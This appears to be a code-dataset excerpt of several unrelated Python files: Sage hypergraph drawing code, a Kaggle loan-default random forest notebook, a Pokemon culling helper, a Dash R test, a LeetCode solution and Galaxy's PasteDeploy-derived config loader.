OUTPUT:
A partition of the sets into color classes.
EXAMPLES::
sage: H = Hypergraph([{1,2,3},{2,3,4},{3,4,5},{4,5,6}]); H
Hypergraph on 6 vertices containing 4 sets
sage: C = H.edge_coloring()
sage: C # random
[[{3, 4, 5}], [{4, 5, 6}, {1, 2, 3}], [{2, 3, 4}]]
sage: Set(sum(C,[])) == Set(H._sets)
True
"""
from sage.graphs.graph import Graph
g = Graph([self._sets,lambda x,y : len(x&y)],loops = False)
return g.coloring(algorithm="MILP")
def _spring_layout(self):
r"""
Return a spring layout for the vertices.
The layout is computed by creating a graph `G` on the vertices *and*
sets of the hypergraph. Each set is then made adjacent in `G` with all
vertices it contains before a spring layout is computed for this
graph. The position of the vertices in the hypergraph is the position of
the same vertices in the graph's layout.
.. NOTE::
This method also returns the position of the "fake" vertices,
i.e. those representing the sets.
EXAMPLES::
sage: H = Hypergraph([{1,2,3},{2,3,4},{3,4,5},{4,5,6}]); H
Hypergraph on 6 vertices containing 4 sets
sage: L = H._spring_layout()
sage: L # random
{1: (0.238, -0.926),
2: (0.672, -0.518),
3: (0.449, -0.225),
4: (0.782, 0.225),
5: (0.558, 0.518),
6: (0.992, 0.926),
{3, 4, 5}: (0.504, 0.173),
{2, 3, 4}: (0.727, -0.173),
{4, 5, 6}: (0.838, 0.617),
{1, 2, 3}: (0.393, -0.617)}
sage: all(v in L for v in H.domain())
True
sage: all(v in L for v in H._sets)
True
"""
from sage.graphs.graph import Graph
g = Graph()
for s in self._sets:
for x in s:
g.add_edge(s,x)
_ = g.plot(iterations = 50000,save_pos=True)
# The values are rounded as TikZ does not like accuracy.
return {k:(round(x,3),round(y,3)) for k,(x,y) in g.get_pos().items()}
def domain(self):
r"""
Return the set of vertices.
EXAMPLES::
sage: H = Hypergraph([{1,2,3},{2,3,4},{3,4,5},{4,5,6}]); H
Hypergraph on 6 vertices containing 4 sets
sage: H.domain()
set([1, 2, 3, 4, 5, 6])
"""
return self._domain.copy()
def _latex_(self):
r"""
Return a TikZ representation of the hypergraph.
EXAMPLES::
sage: H = Hypergraph([{1,2,3},{2,3,4},{3,4,5},{4,5,6}]); H
Hypergraph on 6 vertices containing 4 sets
sage: view(H) # not tested
With sets of size 4::
sage: g = graphs.Grid2dGraph(5,5)
sage: C4 = graphs.CycleGraph(4)
sage: sets = Set(map(Set,list(g.subgraph_search_iterator(C4))))
sage: H = Hypergraph(sets)
sage: view(H) # not tested
"""
from sage.rings.integer import Integer
from sage.functions.trig import arctan2
from sage.misc.misc import warn
warn("\nThe hypergraph is drawn as a set of closed curves. The curve "
"representing a set S go **THROUGH** the vertices contained "
"in S.\n A vertex which is encircled by a curve but is not located "
"on its boundary is **NOT** included in the corresponding set.\n"
"\n"
"The colors are picked for readability and have no other meaning.")
latex.add_package_to_preamble_if_available("tikz")
if not latex.has_file("tikz.sty"):
raise RuntimeError("You must have TikZ installed in order "
"to draw a hypergraph.")
domain = self.domain()
pos = self._spring_layout()
tex = "\\begin{tikzpicture}[scale=3]\n"
colors = ["black", "red", "green", "blue", "cyan", "magenta", "yellow","pink","brown"]
colored_sets = [(s,i) for i,S in enumerate(self.edge_coloring()) for s in S]
# Prints each set with its color
for s,i in colored_sets:
current_color = colors[i%len(colors)]
if len(s) == 2:
s = list(s)
tex += ("\\draw[color="+str(current_color)+","+
"line width=.1cm,opacity = .6] "+
str(pos[s[0]])+" -- "+str(pos[s[1]])+";\n")
continue
tex += ("\\draw[color="+str(current_color)+","
"line width=.1cm,opacity = .6,"
"line cap=round,"
"line join=round]"
"plot [smooth cycle,tension=1] coordinates {")
# Reorders the vertices of s according to their angle with the
# "center", i.e. the vertex representing the set s
cx,cy = pos[s]
s = map(lambda x:pos[x],s)
s = sorted(s, key = lambda (x,y) : arctan2(x-cx,y-cy))
for x in s:
tex += str(x)+" "
tex += "};\n"
# Prints each vertex
for v in domain:
tex += "\\draw node[fill,circle,scale=.5,label={90:$"+latex(v)+"$}] at "+str(pos[v])+" {};\n"
tex += "\\end{tikzpicture}"
return tex
|
python
|
# coding: utf-8
# **In this simple kernel, I will attempt to predict whether customers will be "Charged Off" on a loan using Random Forests Classifier.**
# In[ ]:
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load in
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import matplotlib.pyplot as plt
# Input data files are available in the "../input/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory
from subprocess import check_output
#print(check_output(["ls", "../input"]).decode("utf8"))
# Any results you write to the current directory are saved as output.
# In[ ]:
loan = pd.read_csv("../input/loan.csv")
print(loan.head())
# First let's see how much Nans are there per column
# In[ ]:
#determine nan percentage
check_null = loan.isnull().sum().sort_values(ascending=False)/len(loan)
#print all with 20% NaNs
print(check_null[check_null > 0.2])
# In[ ]:
#loads of columns ... so let's remove these
loan.drop(check_null[check_null > 0.2].index, axis=1, inplace=True)
loan.dropna(axis=0, thresh=30,inplace=True)
# After culling the NaN dominated columns, there are still a lot of features. Some will have useful info, others not. At this point I carefully weeded out any column that I think may be well useless. My main criteria is whether a feature is dominated by a single value (> 80%)
# 1. id and member_id: somehow I don't think these will be useful, condidering all were unique
# 2. Policy_cose: this is the same for all customers
# 3. url: this is the webpage of the loan data. May come in handy at someother stage (maybe)
# 4. zip_code and addr_state: I really don't think that the state and location of aperson will determine if they will repay a loan. Although, I could be wrong ....
# 5. application_type: was >99% INDIVIDUAL
# 6. 'pymnt_plan': 99.99% N
# 7. emp_title: this could be useful. Possbly through NLP.
# 8. acc_now_delinq: > 99% 0
# 9. title: may be very useful. Requires NLP
# 10. collections_12_mths_ex_med: ~98% 0
# 11. collection_recovery_fee > 98% 0
# In[ ]:
#first let's remove some columns
del_cols = ['id', 'member_id', 'policy_code', 'url', 'zip_code', 'addr_state',
'pymnt_plan','emp_title','application_type','acc_now_delinq','title',
'collections_12_mths_ex_med','collection_recovery_fee']
# In[ ]:
loan = loan.drop(del_cols,axis=1)
# The point of this exercise is to predict if a loan will be "Charged Off". Let's see the breakdown of the target column: 'loan_status'
# In[ ]:
print(loan['loan_status'].value_counts()/len(loan))
# Yikes! Ok for now we will ignore "Current" customers. Note, we could use the model generated to predict whether a "Current" customers will be "Charged Off".
# In[ ]:
loan = loan[loan['loan_status'] != 'Current']
# In[ ]:
print(loan['loan_status'].value_counts()/len(loan))
# The column 'emp_length' may be useful
# In[ ]:
print(loan['emp_length'].unique())
# Let's convert this to categorical data
# In[ ]:
loan['empl_exp'] = 'experienced'
loan.loc[loan['emp_length'] == '< 1 year', 'empl_exp'] = 'inexp'
loan.loc[loan['emp_length'] == '1 year', 'empl_exp'] = 'new'
loan.loc[loan['emp_length'] == '2 years', 'empl_exp'] = 'new'
loan.loc[loan['emp_length'] == '3 years', 'empl_exp'] = 'new'
loan.loc[loan['emp_length'] == '4 years', 'empl_exp'] = 'intermed'
loan.loc[loan['emp_length'] == '5 years', 'empl_exp'] = 'intermed'
loan.loc[loan['emp_length'] == '6 years', 'empl_exp'] = 'intermed'
loan.loc[loan['emp_length'] == '7 years', 'empl_exp'] = 'seasoned'
loan.loc[loan['emp_length'] == '8 years', 'empl_exp'] = 'seasoned'
loan.loc[loan['emp_length'] == '9 years', 'empl_exp'] = 'seasoned'
loan.loc[loan['emp_length'] == 'n/a', 'empl_exp'] = 'unknown'
#delete the emp_length column
loan = loan.drop('emp_length',axis=1)
# In[ ]:
#remove all rows with nans
loan.dropna(axis=0, how = 'any', inplace = True)
# In[ ]:
print(loan['loan_status'].value_counts()/len(loan))
# In[ ]:
#extract the target column and convert to Charged Off to 1 and the rest as 0
mask = (loan.loan_status == 'Charged Off')
loan['target'] = 0
loan.loc[mask,'target'] = 1
target = loan['target']
loan = loan.drop(['loan_status','target'],axis=1)
# In[ ]:
target.value_counts()
# The next step is to convert all categorical data to dummy numerical data. First let's seperate the categorical from number columns
# In[ ]:
loan_categorical = loan.select_dtypes(include=['object'], exclude=['float64','int64'])
features = loan.select_dtypes(include=['float64','int64'])
# In[ ]:
#one-hot-encode the categorical variables and combine with the numercal values
for col in list(loan_categorical):
dummy = pd.get_dummies(loan_categorical[col])
features = pd.concat([features,dummy],axis=1)
# In[ ]:
#time to split and build models
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(features,target)
# The model we will build is Random Forest
# In[ ]:
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import precision_recall_curve,average_precision_score
from sklearn.metrics import confusion_matrix, classification_report
# In[ ]:
RF = RandomForestClassifier(n_estimators=500)
RF.fit(X_train, y_train)
y_pred = RF.predict(X_test)
print('Test score: {:.2f}'.format(RF.score(X_test, y_test)))
print("Confusion matrix:\n%s" % confusion_matrix(y_test, y_pred))
print("Classification report for Random Forest classifier %s:\n%s\n"
% (RF, classification_report(y_test, y_pred)))
# Nice! Carefully selecting features as well as some feature engineering paid off! 100% precision and 98% Recall for all "Charged off" loans! Since the dataset is skewed, let's have a llok at the Precision and Recall curve
# In[ ]:
precision, recall, thresholds = precision_recall_curve(y_test,RF.predict_proba(X_test)[:, 1])
AUC = average_precision_score(y_test, RF.predict_proba(X_test)[:, 1])
plt.plot(precision, recall, label='AUC: {:.2f} for {} Trees'.format(AUC, 500))
close_default_rf = np.argmin(np.abs(thresholds - 0.5))
plt.plot(precision[close_default_rf], recall[close_default_rf], 'o', c='k',
markersize=10, fillstyle="none", mew=2)
plt.ylabel('Recall')
plt.xlabel('Precision')
plt.title('Precision-Recall Curve Random Forest')
plt.legend(loc='best')
plt.show()
# Next: The next step? We can use this model to determine the probability any of the "Current" customers will be "Charged Off".
|
python
|
from rater import generate_pokemon_list_summary
from common import pokemon_base_stats
from pokedex import pokedex
excluded_pokemon_name_list = []
def find_bad_pokemons(pokemon_list):
pokemon_summary = generate_pokemon_list_summary(pokemon_list)
bad_pokemons_ids = []
for pokemon_name in sorted(pokemon_summary.keys()):
if pokemon_name in excluded_pokemon_name_list:
continue
if len(pokemon_summary[pokemon_name]) == 0:
continue
if pokedex.evolves[pokemon_summary[pokemon_name][0]['pokemon_info']['pokemon_id']] == 0:
# print "skipping", pokemon_name
continue
best_cp_pokemons = sorted(pokemon_summary[pokemon_name], key=lambda pokemon:pokemon['pokemon_info']['cp'], reverse=True)[:1]
best_score_pokemons = sorted(pokemon_summary[pokemon_name], key=lambda pokemon:pokemon['score'], reverse=True)[:2]
pokemons_to_keep = best_cp_pokemons + best_score_pokemons
pokemon_ids_to_keep = [pokemon['pokemon_info']['id'] for pokemon in pokemons_to_keep]
good_pokemons, bad_pokemons = [], []
for pokemon in pokemon_summary[pokemon_name]:
if pokemon['pokemon_info']['id'] not in pokemon_ids_to_keep and pokemon['score'] < 90:
bad_pokemons.append((pokemon['pokemon_info'], pokemon['score'], pokemon['power']))
bad_pokemons_ids.append(pokemon['pokemon_info']['id'])
else:
good_pokemons.append((pokemon['pokemon_info'], pokemon['score'], pokemon['power']))
# if len(good_pokemons) > 0:
# print "good", pokemon_name
# for (pokemon, score, cur_cp_wo_multi) in good_pokemons:
# print "cp:", pokemon['cp'], "score:", score, "power:", cur_cp_wo_multi
# if len(bad_pokemons) > 0:
# print "bad", pokemon_name
# for (pokemon, score, cur_cp_wo_multi) in bad_pokemons:
# print "cp:", pokemon['cp'], "score:", score, "power:", cur_cp_wo_multi, "id:", pokemon['id']
return bad_pokemons_ids
|
python
|
app = """
library(dash)
app <- Dash$new()
app$layout(
html$div(
list(
dccInput(id='input-1-state', type='text', value='Montreal'),
dccInput(id='input-2-state', type='text', value='Canada'),
html$button(id='submit-button', n_clicks=0, 'Submit'),
html$div(id='output-state'),
dccGraph(id='graph',
figure=list(
data=list(
list(
x=list(1, 2, 3),
y=list(4, 1, 2),
type='bar',
name='SF'
),
list(
x=list(1, 2, 3),
y=list(2, 4, 5),
type='bar',
name='Montreal'
)
),
layout = list(title='Dash Data Visualization')
)
)
)
)
)
app$callback(output(id = 'output-state', property = 'children'),
list(input(id = 'submit-button', property = 'n_clicks'),
state(id = 'input-1-state', property = 'value'),
state(id = 'input-2-state', property = 'value')),
function(n_clicks, input1, input2) {
sprintf('The Button has been pressed \\'%s\\' times, Input 1 is \\'%s\\', and Input 2 is \\'%s\\'', n_clicks, input1, input2) # noqa:E501
})
app$run_server()
"""
# pylint: disable=c0301
def test_rsdp001_dopsa(dashr):
dashr.start_server(app)
dashr.wait_for_text_to_equal(
"#output-state", "The Button has been pressed '0' times, Input 1 is 'Montreal', and Input 2 is 'Canada'", timeout=1 # noqa:E501
)
input1 = dashr.find_element("#input-2-state")
dashr.clear_input(input1)
input1.send_keys("Quebec")
dashr.wait_for_text_to_equal(
"#input-2-state", "Quebec", timeout=1
)
dashr.find_element("#submit-button").click()
dashr.wait_for_text_to_equal(
"#output-state", "The Button has been pressed '1' times, Input 1 is 'Montreal', and Input 2 is 'Quebec'", timeout=1 # noqa:E501
)
dashr.percy_snapshot("rsdp001 - dopsa")
|
python
|
class Solution:
def wordPattern(self, pattern, str):
map_letter_to_word = dict()
map_word_to_letter = dict()
words = str.split()
if len(words) != len(pattern):
return False
for letter, word in zip(pattern, words):
if letter in map_letter_to_word and map_letter_to_word[letter] != word:
return False
if word in map_word_to_letter and map_word_to_letter[word] != letter:
return False
map_letter_to_word[letter] = word
map_word_to_letter[word] = letter
return True
|
python
|
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
# Mostly taken from PasteDeploy and stripped down for Galaxy
import inspect
import os
import re
import sys
import pkg_resources
from six import iteritems
from six.moves.urllib.parse import unquote
from galaxy.util.properties import NicerConfigParser
__all__ = ('loadapp', 'loadserver', 'loadfilter', 'appconfig')
# ---- from paste.deploy.compat --------------------------------------
"""Python 2<->3 compatibility module"""
def print_(template, *args, **kwargs):
template = str(template)
if args:
template = template % args
elif kwargs:
template = template % kwargs
sys.stdout.writelines(template)
if sys.version_info < (3, 0):
def reraise(t, e, tb):
exec('raise t, e, tb', dict(t=t, e=e, tb=tb))
else:
def reraise(t, e, tb):
exec('raise e from tb', dict(e=e, tb=tb))
# ---- from paste.deploy.util ----------------------------------------
def fix_type_error(exc_info, callable, varargs, kwargs):
"""
Given an exception, this will test if the exception was due to a
signature error, and annotate the error with better information if
so.
Usage::
try:
val = callable(*args, **kw)
except TypeError:
exc_info = fix_type_error(None, callable, args, kw)
raise exc_info[0], exc_info[1], exc_info[2]
"""
if exc_info is None:
exc_info = sys.exc_info()
if (exc_info[0] != TypeError or
str(exc_info[1]).find('arguments') == -1 or
getattr(exc_info[1], '_type_error_fixed', False)):
return exc_info
exc_info[1]._type_error_fixed = True
argspec = inspect.formatargspec(*inspect.getargspec(callable))
args = ', '.join(map(_short_repr, varargs))
if kwargs and args:
args += ', '
if kwargs:
kwargs = sorted(kwargs.keys())
args += ', '.join('%s=...' % n for n in kwargs)
gotspec = '(%s)' % args
msg = '%s; got %s, wanted %s' % (exc_info[1], gotspec, argspec)
exc_info[1].args = (msg,)
return exc_info
def _short_repr(v):
v = repr(v)
if len(v) > 12:
v = v[:8] + '...' + v[-4:]
return v
def fix_call(callable, *args, **kw):
"""
Call ``callable(*args, **kw)`` fixing any type errors that come out.
"""
try:
val = callable(*args, **kw)
except TypeError:
exc_info = fix_type_error(None, callable, args, kw)
reraise(*exc_info)
return val
def lookup_object(spec):
"""
Looks up a module or object from a some.module:func_name specification.
To just look up a module, omit the colon and everything after it.
"""
parts, target = spec.split(':') if ':' in spec else (spec, None)
module = __import__(parts)
for part in parts.split('.')[1:] + ([target] if target else []):
module = getattr(module, part)
return module
# ---- from paste.deploy.loadwsgi ------------------------------------
############################################################
# Utility functions
############################################################
def import_string(s):
return pkg_resources.EntryPoint.parse("x=" + s).load(False)
def _aslist(obj):
"""
Turn object into a list; lists and tuples are left as-is, None
becomes [], and everything else turns into a one-element list.
"""
if obj is None:
return []
elif isinstance(obj, (list, tuple)):
return obj
else:
return [obj]
def _flatten(lst):
"""
Flatten a nested list.
"""
if not isinstance(lst, (list, tuple)):
return [lst]
result = []
for item in lst:
result.extend(_flatten(item))
return result
############################################################
# Object types
############################################################
class _ObjectType(object):
name = None
egg_protocols = None
config_prefixes = None
def __init__(self):
# Normalize these variables:
self.egg_protocols = [_aslist(p) for p in _aslist(self.egg_protocols)]
self.config_prefixes = [_aslist(p) for p in _aslist(self.config_prefixes)]
def __repr__(self):
return '<%s protocols=%r prefixes=%r>' % (
self.name, self.egg_protocols, self.config_prefixes)
def invoke(self, context):
assert context.protocol in _flatten(self.egg_protocols)
return fix_call(context.object,
context.global_conf, **context.local_conf)
class _App(_ObjectType):
name = 'application'
egg_protocols = ['paste.app_factory', 'paste.composite_factory',
'paste.composit_factory']
config_prefixes = [['app', 'application'], ['composite', 'composit'],
'pipeline', 'filter-app']
def invoke(self, context):
if context.protocol in ('paste.composit_factory',
'paste.composite_factory'):
return fix_call(context.object,
context.loader, context.global_conf,
**context.local_conf)
elif context.protocol == 'paste.app_factory':
return fix_call(context.object, context.global_conf, **context.local_conf)
else:
assert 0, "Protocol %r unknown" % context.protocol
APP = _App()
class _Filter(_ObjectType):
name = 'filter'
egg_protocols = [['paste.filter_factory', 'paste.filter_app_factory']]
config_prefixes = ['filter']
def invoke(self, context):
if context.protocol == 'paste.filter_factory':
return fix_call(context.object,
context.global_conf, **context.local_conf)
elif context.protocol == 'paste.filter_app_factory':
def filter_wrapper(wsgi_app):
# This should be an object, so it has a nicer __repr__
return fix_call(context.object,
wsgi_app, context.global_conf,
**context.local_conf)
return filter_wrapper
else:
assert 0, "Protocol %r unknown" % context.protocol
FILTER = _Filter()
class _Server(_ObjectType):
name = 'server'
egg_protocols = [['paste.server_factory', 'paste.server_runner']]
config_prefixes = ['server']
def invoke(self, context):
if context.protocol == 'paste.server_factory':
return fix_call(context.object,
context.global_conf, **context.local_conf)
elif context.protocol == 'paste.server_runner':
def server_wrapper(wsgi_app):
# This should be an object, so it has a nicer __repr__
return fix_call(context.object,
wsgi_app, context.global_conf,
**context.local_conf)
return server_wrapper
else:
assert 0, "Protocol %r unknown" % context.protocol
SERVER = _Server()
# Virtual type: (@@: There's clearly something crufty here;
# this probably could be more elegant)
class _PipeLine(_ObjectType):
name = 'pipeline'
def invoke(self, context):
app = context.app_context.create()
filters = [c.create() for c in context.filter_contexts]
filters.reverse()
for filter_ in filters:
app = filter_(app)
return app
PIPELINE = _PipeLine()
class _FilterApp(_ObjectType):
name = 'filter_app'
def invoke(self, context):
next_app = context.next_context.create()
filter_ = context.filter_context.create()
return filter_(next_app)
FILTER_APP = _FilterApp()
class _FilterWith(_App):
name = 'filtered_with'
def invoke(self, context):
filter_ = context.filter_context.create()
filtered = context.next_context.create()
if context.next_context.object_type is APP:
return filter_(filtered)
else:
# filtering a filter
def composed(app):
return filter_(filtered(app))
return composed
FILTER_WITH = _FilterWith()
############################################################
# Loaders
############################################################
def loadapp(uri, name=None, **kw):
return loadobj(APP, uri, name=name, **kw)
def loadfilter(uri, name=None, **kw):
return loadobj(FILTER, uri, name=name, **kw)
def loadserver(uri, name=None, **kw):
return loadobj(SERVER, uri, name=name, **kw)
def appconfig(uri, name=None, relative_to=None, global_conf=None):
context = loadcontext(APP, uri, name=name,
relative_to=relative_to,
global_conf=global_conf)
return context.config()
_loaders = {}
def loadobj(object_type, uri, name=None, relative_to=None,
global_conf=None):
context = loadcontext(
object_type, uri, name=name, relative_to=relative_to,
global_conf=global_conf)
return context.create()
def loadcontext(object_type, uri, name=None, relative_to=None,
global_conf=None):
if '#' in uri:
if name is None:
uri, name = uri.split('#', 1)
else:
# @@: Ignore fragment or error?
uri = uri.split('#', 1)[0]
if name is None:
name = 'main'
if ':' not in uri:
raise LookupError("URI has no scheme: %r" % uri)
scheme, path = uri.split(':', 1)
scheme = scheme.lower()
if scheme not in _loaders:
raise LookupError(
"URI scheme not known: %r (from %s)"
% (scheme, ', '.join(_loaders.keys())))
return _loaders[scheme](
object_type,
uri, path, name=name, relative_to=relative_to,
global_conf=global_conf)
def _loadconfig(object_type, uri, path, name, relative_to,
global_conf):
isabs = os.path.isabs(path)
# De-Windowsify the paths:
path = path.replace('\\', '/')
if not isabs:
if not relative_to:
raise ValueError(
"Cannot resolve relative uri %r; no relative_to keyword "
"argument given" % uri)
relative_to = relative_to.replace('\\', '/')
if relative_to.endswith('/'):
path = relative_to + path
else:
path = relative_to + '/' + path
if path.startswith('///'):
path = path[2:]
path = unquote(path)
loader = ConfigLoader(path)
if global_conf:
loader.update_defaults(global_conf, overwrite=False)
return loader.get_context(object_type, name, global_conf)
_loaders['config'] = _loadconfig
def _loadegg(object_type, uri, spec, name, relative_to,
global_conf):
loader = EggLoader(spec)
return loader.get_context(object_type, name, global_conf)
_loaders['egg'] = _loadegg
def _loadfunc(object_type, uri, spec, name, relative_to,
global_conf):
loader = FuncLoader(spec)
return loader.get_context(object_type, name, global_conf)
_loaders['call'] = _loadfunc
############################################################
# Loaders
############################################################
class _Loader(object):
def get_app(self, name=None, global_conf=None):
return self.app_context(
name=name, global_conf=global_conf).create()
def get_filter(self, name=None, global_conf=None):
return self.filter_context(
name=name, global_conf=global_conf).create()
def get_server(self, name=None, global_conf=None):
return self.server_context(
name=name, global_conf=global_conf).create()
def app_context(self, name=None, global_conf=None):
return self.get_context(
APP, name=name, global_conf=global_conf)
def filter_context(self, name=None, global_conf=None):
return self.get_context(
FILTER, name=name, global_conf=global_conf)
def server_context(self, name=None, global_conf=None):
return self.get_context(
SERVER, name=name, global_conf=global_conf)
_absolute_re = re.compile(r'^[a-zA-Z]+:')
def absolute_name(self, name):
"""
Returns true if the name includes a scheme
"""
if name is None:
return False
return self._absolute_re.search(name)
class ConfigLoader(_Loader):
def __init__(self, filename):
self.filename = filename = filename.strip()
defaults = {
'here': os.path.dirname(os.path.abspath(filename)),
'__file__': os.path.abspath(filename)
}
self.parser = NicerConfigParser(filename, defaults=defaults)
self.parser.optionxform = str # Don't lower-case keys
with open(filename) as f:
self.parser.read_file(f)
def update_defaults(self, new_defaults, overwrite=True):
for key, value in iteritems(new_defaults):
if not overwrite and key in self.parser._defaults:
continue
self.parser._defaults[key] = value
def get_context(self, object_type, name=None, global_conf=None):
if self.absolute_name(name):
return loadcontext(object_type, name,
relative_to=os.path.dirname(self.filename),
global_conf=global_conf)
section = self.find_config_section(
object_type, name=name)
if global_conf is None:
global_conf = {}
else:
global_conf = global_conf.copy()
defaults = self.parser.defaults()
global_conf.update(defaults)
local_conf = {}
global_additions = {}
get_from_globals = {}
for option in self.parser.options(section):
if option.startswith('set '):
name = option[4:].strip()
global_additions[name] = global_conf[name] = (
self.parser.get(section, option))
elif option.startswith('get '):
name = option[4:].strip()
get_from_globals[name] = self.parser.get(section, option)
else:
if option in defaults:
# @@: It's a global option (?), so skip it
continue
local_conf[option] = self.parser.get(section, option)
for local_var, glob_var in get_from_globals.items():
local_conf[local_var] = global_conf[glob_var]
if object_type in (APP, FILTER) and 'filter-with' in local_conf:
filter_with = local_conf.pop('filter-with')
else:
filter_with = None
if 'require' in local_conf:
for spec in local_conf['require'].split():
pkg_resources.require(spec)
del local_conf['require']
if section.startswith('filter-app:'):
context = self._filter_app_context(
object_type, section, name=name,
global_conf=global_conf, local_conf=local_conf,
global_additions=global_additions)
elif section.startswith('pipeline:'):
context = self._pipeline_app_context(
object_type, section, name=name,
global_conf=global_conf, local_conf=local_conf,
global_additions=global_additions)
elif 'use' in local_conf:
context = self._context_from_use(
object_type, local_conf, global_conf, global_additions,
section)
else:
context = self._context_from_explicit(
object_type, local_conf, global_conf, global_additions,
section)
if filter_with is not None:
filter_with_context = LoaderContext(
obj=None,
object_type=FILTER_WITH,
protocol=None,
global_conf=global_conf, local_conf=local_conf,
loader=self)
filter_with_context.filter_context = self.filter_context(
name=filter_with, global_conf=global_conf)
filter_with_context.next_context = context
return filter_with_context
return context
def _context_from_use(self, object_type, local_conf, global_conf,
global_additions, section):
use = local_conf.pop('use')
context = self.get_context(
object_type, name=use, global_conf=global_conf)
context.global_conf.update(global_additions)
context.local_conf.update(local_conf)
if '__file__' in global_conf:
# use sections shouldn't overwrite the original __file__
context.global_conf['__file__'] = global_conf['__file__']
# @@: Should loader be overwritten?
context.loader = self
if context.protocol is None:
# Determine protocol from section type
section_protocol = section.split(':', 1)[0]
if section_protocol in ('application', 'app'):
context.protocol = 'paste.app_factory'
elif section_protocol in ('composit', 'composite'):
context.protocol = 'paste.composit_factory'
else:
# This will work with 'server' and 'filter', otherwise it
# could fail but there is an error message already for
# bad protocols
context.protocol = 'paste.%s_factory' % section_protocol
return context
def _context_from_explicit(self, object_type, local_conf, global_conf,
global_addition, section):
possible = []
for protocol_options in object_type.egg_protocols:
for protocol in protocol_options:
if protocol in local_conf:
possible.append((protocol, local_conf[protocol]))
break
if len(possible) > 1:
raise LookupError(
"Multiple protocols given in section %r: %s"
% (section, possible))
if not possible:
raise LookupError(
"No loader given in section %r" % section)
found_protocol, found_expr = possible[0]
del local_conf[found_protocol]
value = import_string(found_expr)
context = LoaderContext(
value, object_type, found_protocol,
global_conf, local_conf, self)
return context
def _filter_app_context(self, object_type, section, name,
global_conf, local_conf, global_additions):
if 'next' not in local_conf:
raise LookupError(
"The [%s] section in %s is missing a 'next' setting"
% (section, self.filename))
next_name = local_conf.pop('next')
context = LoaderContext(None, FILTER_APP, None, global_conf,
local_conf, self)
context.next_context = self.get_context(
APP, next_name, global_conf)
if 'use' in local_conf:
context.filter_context = self._context_from_use(
FILTER, local_conf, global_conf, global_additions,
section)
else:
context.filter_context = self._context_from_explicit(
FILTER, local_conf, global_conf, global_additions,
section)
return context
def _pipeline_app_context(self, object_type, section, name,
global_conf, local_conf, global_additions):
if 'pipeline' not in local_conf:
raise LookupError(
"The [%s] section in %s is missing a 'pipeline' setting"
% (section, self.filename))
pipeline = local_conf.pop('pipeline').split()
if local_conf:
raise LookupError(
"The [%s] pipeline section in %s has extra "
"(disallowed) settings: %s"
% (', '.join(local_conf.keys())))
context = LoaderContext(None, PIPELINE, None, global_conf,
local_conf, self)
context.app_context = self.get_context(
APP, pipeline[-1], global_conf)
context.filter_contexts = [
self.get_context(FILTER, pname, global_conf)
for pname in pipeline[:-1]]
return context
def find_config_section(self, object_type, name=None):
"""
Return the section name with the given name prefix (following the
same pattern as ``protocol_desc`` in ``config``. It must have the
given name, or for ``'main'`` an empty name is allowed. The
prefix must be followed by a ``:``.
Case is *not* ignored.
"""
possible = []
for name_options in object_type.config_prefixes:
for name_prefix in name_options:
found = self._find_sections(
self.parser.sections(), name_prefix, name)
if found:
possible.extend(found)
break
if not possible:
raise LookupError(
"No section %r (prefixed by %s) found in config %s"
% (name,
' or '.join(map(repr, _flatten(object_type.config_prefixes))),
self.filename))
if len(possible) > 1:
raise LookupError(
"Ambiguous section names %r for section %r (prefixed by %s) "
"found in config %s"
% (possible, name,
' or '.join(map(repr, _flatten(object_type.config_prefixes))),
self.filename))
return possible[0]
def _find_sections(self, sections, name_prefix, name):
found = []
if name is None:
if name_prefix in sections:
found.append(name_prefix)
name = 'main'
for section in sections:
if section.startswith(name_prefix + ':'):
if section[len(name_prefix) + 1:].strip() == name:
found.append(section)
return found
class EggLoader(_Loader):
def __init__(self, spec):
self.spec = spec
def get_context(self, object_type, name=None, global_conf=None):
if self.absolute_name(name):
return loadcontext(object_type, name,
global_conf=global_conf)
entry_point, protocol, ep_name = self.find_egg_entry_point(
object_type, name=name)
return LoaderContext(
entry_point,
object_type,
protocol,
global_conf or {}, {},
self,
distribution=pkg_resources.get_distribution(self.spec),
entry_point_name=ep_name)
def find_egg_entry_point(self, object_type, name=None):
"""
Returns the (entry_point, protocol) for the with the given
``name``.
"""
if name is None:
name = 'main'
possible = []
for protocol_options in object_type.egg_protocols:
for protocol in protocol_options:
pkg_resources.require(self.spec)
entry = pkg_resources.get_entry_info(
self.spec,
protocol,
name)
if entry is not None:
possible.append((entry.load(), protocol, entry.name))
break
if not possible:
# Better exception
dist = pkg_resources.get_distribution(self.spec)
raise LookupError(
"Entry point %r not found in egg %r (dir: %s; protocols: %s; "
"entry_points: %s)"
% (name, self.spec,
dist.location,
', '.join(_flatten(object_type.egg_protocols)),
', '.join(_flatten([
list((pkg_resources.get_entry_info(self.spec, prot, name) or {}).keys())
for prot in protocol_options] or '(no entry points)'))))
if len(possible) > 1:
raise LookupError(
"Ambiguous entry points for %r in egg %r (protocols: %s)"
% (name, self.spec, ', '.join(_flatten(protocol_options))))
return possible[0]
class FuncLoader(_Loader):
""" Loader that supports specifying functions inside modules, without
using eggs at all. Configuration should be in the format:
use = call:my.module.path:function_name
Dot notation is supported in both the module and function name, e.g.:
use = call:my.module.path:object.method
"""
def __init__(self, spec):
self.spec = spec
if ':' not in spec:
raise LookupError("Configuration not in format module:function")
def get_context(self, object_type, name=None, global_conf=None):
obj = lookup_object(self.spec)
return LoaderContext(
obj,
object_type,
None, # determine protocol from section type
global_conf or {},
{},
self,
)
class LoaderContext(object):
def __init__(self, obj, object_type, protocol,
global_conf, local_conf, loader,
distribution=None, entry_point_name=None):
self.object = obj
self.object_type = object_type
self.protocol = protocol
# assert protocol in _flatten(object_type.egg_protocols), (
# "Bad protocol %r; should be one of %s"
# % (protocol, ', '.join(map(repr, _flatten(object_type.egg_protocols)))))
self.global_conf = global_conf
self.local_conf = local_conf
self.loader = loader
self.distribution = distribution
self.entry_point_name = entry_point_name
def create(self):
return self.object_type.invoke(self)
def config(self):
conf = AttrDict(self.global_conf)
conf.update(self.local_conf)
conf.local_conf = self.local_conf
conf.global_conf = self.global_conf
conf.context = self
return conf
